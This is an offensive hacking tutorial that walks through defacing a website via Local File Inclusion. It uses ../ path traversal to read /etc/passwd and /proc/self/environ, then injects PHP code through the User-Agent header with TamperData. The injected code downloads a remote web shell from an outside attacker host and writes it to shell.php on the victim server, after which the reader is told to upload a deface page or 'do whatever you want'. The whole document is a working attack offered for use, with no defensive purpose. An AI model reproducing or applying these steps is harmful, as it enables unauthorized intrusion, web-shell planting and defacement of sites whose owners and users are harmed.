LFI
Stands For "Local File Inclusion".LFI is a type of web-application
security vulnerability. LFI is only one of many web-application security
vulnerabilities. Web-applications is applications(in other words:
pages/websites) you can view and interact with in your web browser. In This
Tutorial I will show you how to Deface a website using LFI Vunerability.
First
of all You need Two Things
1. You will need FireFox
2. TamperData Addon For Firefox
LFI
allows you to include a local file (which means, that the file is stored on the
server) and run it in a webscript.
In this
Tutorial we are going to upload a shell by accessing the proc/self/environ.
1. We
have our page
http://www.mywebsite.com/index.php?include=register.php
2. Now
we are going to do this:
http://www.mywebsite.com/index.php?include=../
3. If
it gives you an error message, this is good. Best thing that can happen is, it
says "No such file or directory". But anyways, now add this to your
url:
http://www.mywebsite.com/index.php?include=../etc/passwd
4. As
long as there is no text other than an error message on the page, keep adding
"../" to the URL, so it would be like:
http://www.mywebsite.com/index.php?include=../etc/passwd
http://www.mywebsite.com/index.php?include=../../etc/passwd
http://www.mywebsite.com/index.php?include=../../../etc/passwd
5. So
on. Now let's say we got to this URL
http://www.mywebsite.com/index.php?include=../../../etc/passwd
6. we
see some huge shitty text we can not handle with. Now change the etc/passwd in
the URL to proc/self/environ so it would look like this:
http://www.mywebsite.com/index.php?include=../../../proc/self/environ
7. If
you see some text, you did good, if you see an error message you did bad. Now
this is the point where we use Tamper Data. Start you Tamper and reload the
page, and for user agent you type in the following
PHP
Code:
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.z0mgh4x0rpage.com/mastershell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
This
will execute the PHP script on the site and create a shell.php on the server.
Why? Because the user agent is being displayed on the webpage, and if you put
in a webscript for that, it will execute it.
8. Now
simply access your shell by going to
http://www.mywebsite.com/shell.php
9. Upload
Your Deface Page to server or Do Whatever you want.
